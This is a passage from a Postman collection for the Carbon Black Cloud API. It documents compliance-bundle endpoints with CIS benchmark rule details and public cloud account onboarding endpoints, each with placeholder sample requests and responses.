Version","id":"42fd93c8-777f-4646-b07f-f9e479d395d8","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"bundle_id\": \"a0423be0-eddd-4170-99fc-78d5cb8f157fXXXX\",\n        \"new_version\": \"1.0.0.2\"\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/bundles/updates/_ack","description":"<p>Acknowledges new updates for the compliance bundles specified in the request.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">[\n    {\n        \"bundle_id\": \"\",\n        \"new_version\": \"\"\n    }\n]\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/cis-benchmark-api/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","bundles","updates","_ack"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"b2731ffd-1a32-4f19-969b-95eb657873dc","name":"Acknowledge Compliance Bundle Version","originalRequest":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"bundle_id\": \"a0423be0-eddd-4170-99fc-78d5cb8f157f\",\n        \"new_version\": \"1.0.0.2\"\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/bundles/updates/_ack"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 14 Feb 2024 20:18:06 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"71"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"[\n    {\n        \"bundle_id\": \"a0423be0-eddd-4170-99fc-78d5cb8f157f\",\n        \"new_version\": \"1.0.0.2\"\n    }\n]"}],"_postman_id":"42fd93c8-777f-4646-b07f-f9e479d395d8"},{"name":"Diff Compliance Bundle Versions","id":"6a863730-d5f4-4e3e-9a19-7ecc318aa2bc","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"old_version\": \"1.0.0.1\",\n    \"new_version\": \"1.0.0.2\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/bundles/{{cb_bundle_id}}/versions/_diff","description":"<p>Get the differences between two Compliance Bundle versions</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"old_version\": \"\",\n    \"new_version\": \"\"\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/cis-benchmark-api/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","bundles","{{cb_bundle_id}}","versions","_diff"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"518df47c-64ea-4122-8847-af70128d2481","name":"Diff Compliance Bundle Version","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"old_version\": \"1.0.0.1\",\n    \"new_version\": \"1.0.0.2\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/bundles/{{cb_bundle_id}}/versions/_diff"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 14 Feb 2024 20:18:18 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Transfer-Encoding","value":"chunked"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"old_version\": \"1.0.0.1\",\n    \"new_version\": \"1.0.0.2\",\n    \"change_count\": 2,\n    \"added_count\": 1,\n    \"removed_count\": 1,\n    \"changes\": [\n        {\n            \"action\": \"REMOVED\",\n            \"rule_id\": \"3FD16705-1E01-47E4-AE3B-CA18FA60C433\",\n            \"fields\": [\n                {\n                    \"key\": \"rule_id\",\n                    \"old_value\": null,\n                    \"value\": \"3FD16705-1E01-47E4-AE3B-CA18FA60C433\"\n                },\n                {\n                    \"key\": \"rule_name\",\n                    \"old_value\": null,\n                    \"value\": \"(L1) Ensure 'Minimum password length' is set to '14 or more character(s)'\"\n                },\n                {\n                    \"key\": \"section_id\",\n                    \"old_value\": null,\n                    \"value\": \"5C3C74D2-42E0-6E90-E20C-F275DE67AFD4\"\n                },\n                {\n                    \"key\": \"section_name\",\n                    \"old_value\": null,\n                    \"value\": \"Password Policy\"\n                }\n            ]\n        },\n        {\n            \"action\": \"ADDED\",\n            \"rule_id\": \"004e9492-ba62-4a4c-a433-3dc44b96b074\",\n            \"fields\": [\n                {\n                    \"key\": \"rule_id\",\n                    \"old_value\": null,\n                    \"value\": \"004e9492-ba62-4a4c-a433-3dc44b96b074\"\n                },\n                {\n                    \"key\": \"rule_name\",\n                    \"old_value\": null,\n                    \"value\": \"(L1) Ensure 'Create a token object' is set to 'No One'\"\n                },\n                {\n                    \"key\": \"section_id\",\n                    \"old_value\": null,\n                    \"value\": \"c9744adf-e7a0-43b4-97b8-64da8317ed2a\"\n                },\n                {\n                    \"key\": \"section_name\",\n                    \"old_value\": null,\n                    \"value\": \"User Rights Assignment\"\n                }\n            ]\n        }\n    ]\n}"}],"_postman_id":"6a863730-d5f4-4e3e-9a19-7ecc318aa2bc"},{"name":"Get Rule Info for Bundle Version","id":"1c3a1687-e212-46d8-aac4-1927805f68ca","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/bundles/{{cb_bundle_id}}/versions/{{cb_benchmark_bundle_version_id}}/rules/{{cb_benchmark_set_rule_id}}","description":"<p>Gets the Rule Info for the specified compliance bundle version</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/cis-benchmark-api/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","bundles","{{cb_bundle_id}}","versions","{{cb_benchmark_bundle_version_id}}","rules","{{cb_benchmark_set_rule_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"d3df6f22-232a-4126-af39-8a21fe5c138f","name":"Get Rule Info for Bundle Version","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/bundles/{{cb_bundle_id}}/versions/{{cb_benchmark_bundle_version_id}}/rules/{{cb_benchmark_set_rule_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 14 Feb 2024 20:16:57 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"995"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"004e9492-ba62-4a4c-a433-3dc44b96b074\",\n    \"rule_name\": \"(L1) Ensure 'Create a token object' is set to 'No One'\",\n    \"enabled\": null,\n    \"section_id\": \"c9744adf-e7a0-43b4-97b8-64da8317ed2a\",\n    \"section_name\": \"User Rights Assignment\",\n    \"supported_os_info\": [\n        {\n            \"os_metadata_id\": \"1\",\n            \"os_type\": \"WINDOWS\",\n            \"os_name\": \"Windows Server 2012 x64\",\n            \"cis_version\": \"2.3.0\"\n        },\n        {\n            \"os_metadata_id\": \"2\",\n            \"os_type\": \"WINDOWS\",\n            \"os_name\": \"Windows Server 2012 R2 x64\",\n            \"cis_version\": \"2.5.0\"\n        }\n    ],\n    \"description\": \"This policy setting allows a process to create an access token, which may provide elevated rights to access sensitive data.\\n\\nThe recommended state for this setting is: `No One`.\\n\\n**Note:** This user right is considered a \\\"sensitive privilege\\\" for the purposes of auditing.\",\n    \"rationale\": \"A user account that is given this user right has complete control over the system and can lead to the system being compromised. It is highly recommended that you do not assign any user accounts this right.\\n\\nThe operating system examines a user's access token to determine the level of the user's privileges. Access tokens are built when users log on to the local computer or connect to a remote computer over a network. When you revoke a privilege, the change is immediately recorded, but the change is not reflected in the user's access token until the next time the user logs on or connects. Users with the ability to create or modify tokens can change the level of access for any currently logged on account. They could escalate their own privileges or create a DoS condition.\",\n    \"impact\": \"None - this is the default behavior.\",\n    \"remediation\": {\n        \"procedure\": \"To establish the recommended configuration via GP, set the following UI path to `No One`\",\n        \"steps\": \"\\n\\n ```\\nComputer Configuration\\\\Policies\\\\Windows Settings\\\\Security Settings\\\\Local Policies\\\\User Rights Assignment\\\\Create a token object\\n```\"\n    },\n    \"profile\": [\n        \"Level 1 Domain Controller\",\n        \"Level 1 Member Server\"\n    ]\n}"}],"_postman_id":"1c3a1687-e212-46d8-aac4-1927805f68ca"}],"id":"4fb04d5f-c5d1-4a48-b9bb-1da8f48026c4","description":"<p>A bundle is a versioned set of rules.</p>\n","_postman_id":"4fb04d5f-c5d1-4a48-b9bb-1da8f48026c4","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}}],"id":"f06b2b22-ba42-421a-93a7-3b14e3952dcc","description":"<p>CIS benchmarks are configuration guidelines published by the Center for Internet Security. The CIS Benchmark APIs, in the Compliance Assessment service, enable configuration and retrieval of Benchmark Sets and Rules configured in Carbon Black Cloud Rules and the Results from scans performed using these Rules.</p>\n<p>For more information on this feature see the <a href>Carbon Black Cloud User Guidee</a>. The APIs here enable access to the same features for automation and integration use cases.</p>\n<p>For more information on CIS Benchmarks, see the <a href>Center for Internet Security</a>. CIS benchmarks contain over 100 configuration guidelines created by a global community of cybersecurity experts to safeguard various systems against attacks targeting configuration vulnerabilities.</p>\n<p>By monitoring compliance against benchmark recommendations, you can remediate issues and improve the security posture of your organization. The custom osquery extension collects the CIS benchmark results, see <a href>Live Query Extension Tables</a>.</p>\n<h2 id=\"use-cases\">Use Cases</h2>\n<p>Through these APIs you can</p>\n<ul>\n<li>Curate benchmarks</li>\n<li>Query compliance results</li>\n<li>Export compliance results</li>\n</ul>\n<h2 id=\"requirements\">Requirements</h2>\n<ul>\n<li>Carbon Black Cloud Workload - You must have purchased one of the Carbon Black Cloud Workload packages.</li>\n<li>All API calls require an API key with appropriate permissions see <a href>Authentication</a>.</li>\n</ul>\n","_postman_id":"f06b2b22-ba42-421a-93a7-3b14e3952dcc","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Public Cloud Account API","item":[{"name":"Onboard New Cloud Account","id":"d5521a70-7f9b-4774-bd6c-53f6d401c129","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"cloud_provider_account_id\": \"1234567890\",\n    \"cloud_provider\": \"AWS\",\n    \"name\": \"AWS Account 1\",\n    \"owner_name\": \"Test\",\n    \"owner_email\": \"test@testorg.com\",\n    \"environment\": \"DEV\",\n    \"credential\": {\n        \"role_arn\": \"arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot\",\n        \"external_id\": \"afd5813b-e3c6-471a-b30e-3a8577f89111\"\n    },\n    \"regions\": [\n        \"us-east-1\"\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts","description":"<h3 id=\"onboard-new-cloud-account\">Onboard New Cloud Account</h3>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.accounts</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"cloud_provider_account_id\": \"&lt;string&gt;\",\n  \"cloud_provider\": \"&lt;string&gt;\",\n  \"name\": \"&lt;string&gt;\",\n  \"owner_name\": \"&lt;string&gt;\",\n  \"owner_email\": \"&lt;string&gt;\",\n  \"environment\": \"&lt;string&gt;\",\n  \"credential\": {\n    \"role_arn\": \"&lt;string&gt;\",\n    \"external_id\": \"&lt;string&gt;\"\n  },\n  \"regions\": [\"&lt;string&gt;\"],\n  \"created_by\": \"&lt;string&gt;\",\n  \"updated_by\": \"&lt;string&gt;\",\n  \"event_stream_status\": \"&lt;string&gt;\",\n  \"ssm_document_status\": \"&lt;string&gt;\",\n  \"parent_id\": \"&lt;string&gt;\",\n  \"aws_account_joined_method\": \"&lt;string&gt;\",\n  \"new_accounts_discovered\": &lt;boolean&gt;,\n  \"aws_account_type\": \"&lt;string&gt;\",\n  \"is_onboarded\": &lt;boolean&gt;,\n  \"account_discovery_status\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#onboard-new-cloud-account\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","accounts"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"f673c28e-785b-4729-9536-e8128da7bfe9","name":"Onboard AWS Cloud Account","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"cloud_provider_account_id\": \"1234567890\",\n    \"cloud_provider\": \"AWS\",\n    \"name\": \"AWS Account 1\",\n    \"owner_name\": \"Test\",\n    \"owner_email\": \"test@testorg.com\",\n    \"environment\": \"DEV\",\n    \"credential\": {\n        \"role_arn\": \"arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot\",\n        \"external_id\": \"QWERTY\"\n    },\n    \"regions\": [\n        \"us-east-1\"\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 31 Aug 2023 15:26:31 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"1031"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"7a7e76f7-f786-4d9d-9b6d-cf6a172b74b0"}],"cookie":[],"responseTime":null,"body":"{\n    \"name\": \"AWS Account 1\",\n    \"owner_name\": \"Test\",\n    \"owner_email\": \"test@testorg.com\",\n    \"environment\": \"DEV\",\n    \"credential\": {\n        \"verification_status\": \"IN_PROGRESS\",\n        \"verification_code\": null,\n        \"verification_message\": null,\n        \"last_verified_time\": null,\n        \"role_arn\": \"arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot\",\n        \"external_id\": \"afd5813b-e3c6-471a-b30e-3a8577f89111\",\n        \"application_id\": null,\n        \"tenant_id\": null,\n        \"secret_id\": null,\n        \"secret\": null,\n        \"secret_expiry\": null,\n        \"identity_provider_project_no\": null,\n        \"service_account_email\": null,\n        \"identity_pool_id\": null,\n        \"identity_provider_id\": null\n    },\n    \"last_updated_time\": \"2023-08-31T15:26:30.703570Z\",\n    \"regions\": [\n        \"us-east-1\"\n    ],\n    \"created_by\": \"ABCD1234\",\n    \"updated_by\": \"ABCD1234\",\n    \"event_stream_status\": null,\n    \"ssm_document_status\": null,\n    \"parent_id\": null,\n    \"aws_account_joined_method\": null,\n    \"new_accounts_discovered\": false,\n    \"aws_account_type\": \"INDEPENDENT\",\n    \"is_onboarded\": true,\n    \"account_discovery_status\": null,\n    \"parent_account_id\": null,\n    \"cloud_provider_account_id\": \"1234567890\",\n    \"cloud_provider\": \"AWS\"\n}"}],"_postman_id":"d5521a70-7f9b-4774-bd6c-53f6d401c129"},{"name":"Onboard Multiple Accounts","id":"5f72193e-6eaa-43b4-983a-ac42c672a9ce","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"account_ids\": [\n        {\n            \"cloud_provider_account_id\": \"1234567890\",\n            \"cloud_provider\": \"AWS\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts/onboard/_bulk","description":"<h3 id=\"onboard-multiple-accounts\">Onboard Multiple Accounts</h3>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.accounts</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"account_ids\": [\n        {\n            \"cloud_provider_account_id\": \"&lt;string&gt;\",\n            \"cloud_provider\": \"&lt;string&gt;\"\n        }\n    ],\n    \"parent_account_id\": {\n        \"cloud_provider_account_id\": \"&lt;string&gt;\",\n        \"cloud_provider\": \"&lt;string&gt;\"\n    }\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#onboard-multiple-accounts\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","accounts","onboard","_bulk"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"0322db58-4c30-4615-b242-87763810474c","name":"Onboard Multiple Accounts By Parent","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"parent_account_id\": {\n        \"cloud_provider_account_id\": \"1234567890\",\n        \"cloud_provider\": \"AWS\"\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts/onboard/_bulk"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 31 Aug 2023 15:31:08 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"92"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"d68d2c00-7339-4b9e-b673-f2c15d9fbb3c"}],"cookie":[],"responseTime":null,"body":"{\n    \"failed\": null,\n    \"success\": true,\n    \"error_code\": null,\n    \"message\": \"Successful\",\n    \"follow_up_api\": null\n}"},{"id":"4344cd79-8d5f-46d5-8d26-8064255629a2","name":"Onboard Multiple Accounts By Account Ids","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"account_ids\": [\n        {\n            \"cloud_provider_account_id\": \"1234567890\",\n            \"cloud_provider\": \"AWS\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts/onboard/_bulk"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 12:38:51 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"92"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"0d4b5e36-db5d-4073-bf63-15ef398ff084"}],"cookie":[],"responseTime":null,"body":"{\n    \"failed\": null,\n    \"success\": true,\n    \"error_code\": null,\n    \"message\": \"Successful\",\n    \"follow_up_api\": null\n}"}],"_postman_id":"5f72193e-6eaa-43b4-983a-ac42c672a9ce"},{"name":"Get Cloud Account by Id","id":"25f7f83a-75f9-47da-989a-fd604266df15","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/cloud_providers/{{cloud_provider}}/accounts/{{cloud_account_id}}","description":"<h3 id=\"get-cloud-account-by-id\">Get Cloud Account by Id</h3>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.accounts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#get-cloud-account-by-id\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","cloud_providers","{{cloud_provider}}","accounts","{{cloud_account_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"7c91f0cc-27cd-4df0-ab7d-431b52f2d4c1","name":"Get Cloud Account by Id","originalRequest":{"method":"GET","header":[],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/cloud_providers/{{cloud_provider}}/accounts/{{cloud_account_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 31 Aug 2023 15:31:42 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"1480"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"b8acead5-7f03-440c-9ae2-71acf8b112ae"}],"cookie":[],"responseTime":null,"body":"{\n    \"name\": \"AWS Account 1\",\n    \"owner_name\": \"Test\",\n    \"owner_email\": \"test@testorg.com\",\n    \"environment\": \"DEV\",\n    \"credential\": {\n        \"verification_status\": \"FAIL\",\n        \"verification_code\": \"CREDENTIAL_ERROR\",\n        \"verification_message\": \"User: arn:aws:sts::1111111111:assumed-role/mcs-psc-dev-cwp-pc-aws-collector-us-east-1-pod/694be2a6-mcs-psc-dev-cwp-pc-aws-collector-us-east-1-pod is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot (Service: Sts, Status Code: 403, Request ID: 43932730-3fe6-491f-b2be-1f648217ac52, Extended Request ID: null)\",\n        \"last_verified_time\": \"2023-08-31T15:26:31.085296Z\",\n        \"role_arn\": \"arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot\",\n        \"external_id\": \"afd5813b-e3c6-471a-b30e-3a8577f89111\",\n        \"application_id\": null,\n        \"tenant_id\": null,\n        \"secret_id\": null,\n        \"secret\": null,\n        \"secret_expiry\": null,\n        \"identity_provider_project_no\": null,\n        \"service_account_email\": null,\n        \"identity_pool_id\": null,\n        \"identity_provider_id\": null\n    },\n    \"last_updated_time\": \"2023-08-31T15:26:30.703570Z\",\n    \"regions\": [\n        \"us-east-1\"\n    ],\n    \"created_by\": \"ABCD1234\",\n    \"updated_by\": \"ABCD1234\",\n    \"event_stream_status\": \"DISABLED\",\n    \"ssm_document_status\": \"DISABLED\",\n    \"parent_id\": null,\n    \"aws_account_joined_method\": null,\n    \"new_accounts_discovered\": false,\n    \"aws_account_type\": \"INDEPENDENT\",\n    \"is_onboarded\": true,\n    \"account_discovery_status\": null,\n    \"parent_account_id\": null,\n    \"cloud_provider_account_id\": \"1234567890\",\n    \"cloud_provider\": \"AWS\"\n}"}],"_postman_id":"25f7f83a-75f9-47da-989a-fd604266df15"},{"name":"Get Regions for a Cloud Account","id":"924b5686-f3f2-4ac1-a6b8-6f10612e0b86","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/cloud_providers/{{cloud_provider}}/accounts/{{cloud_account_id}}/regions","description":"<h3 id=\"get-regions-for-a-cloud-account\">Get Regions for a Cloud Account</h3>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.accounts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#get-regions-for-a-cloud-account\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud 